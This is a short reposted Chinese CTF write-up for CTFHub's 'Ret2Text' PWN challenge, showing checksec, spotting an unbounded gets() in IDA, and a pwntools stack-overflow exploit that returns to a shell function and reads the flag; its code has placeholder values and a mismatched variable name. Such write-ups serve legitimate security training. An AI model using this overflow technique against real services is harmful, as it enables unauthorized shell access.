CTFHUB(PWN)Ret2Text
2022/2/2 23:17:36
本文主要是介绍CTFHUB(PWN)Ret2Text,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
首先检查保护机制 checksec
64 位 + 什么保护都没开
然后放到ida64中查看
发现gets函数,没有限制数据的长度,容易发生栈溢出
shift+F12 找到bin_sh函数地址
64位程序直接读取偏移量
构造payload,编写exp
from pwn import* p=remote("ip",端口) binsh_addr=地址 payload='a'*(0x70+8)+p64(bin_sh) p.sendline(payload) p.interactive
连接成功后ls
cat flag
这篇关于CTFHUB(PWN)Ret2Text的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-05-15PingCAP 黄东旭参与 CCF 秀湖会议,共探开源教育未来
- 2024-05-13PingCAP 戴涛:构建面向未来的金融核心系统
- 2024-05-09flutter3.x_macos桌面os实战
- 2024-05-09Rust中的并发性:Sync 和 Send Traits
- 2024-05-08使用Ollama和OpenWebUI在CPU上玩转Meta Llama3-8B
- 2024-05-08完工标准(DoD)与验收条件(AC)究竟有什么不同?
- 2024-05-084万 star 的 NocoDB 在 sealos 上一键起,轻松把数据库编程智能表格
- 2024-05-08Mac 版Stable Diffusion WebUI的安装
- 2024-05-08解锁CodeGeeX智能问答中3项独有的隐藏技能
- 2024-05-08RAG算法优化+新增代码仓库支持,CodeGeeX的@repo功能效果提升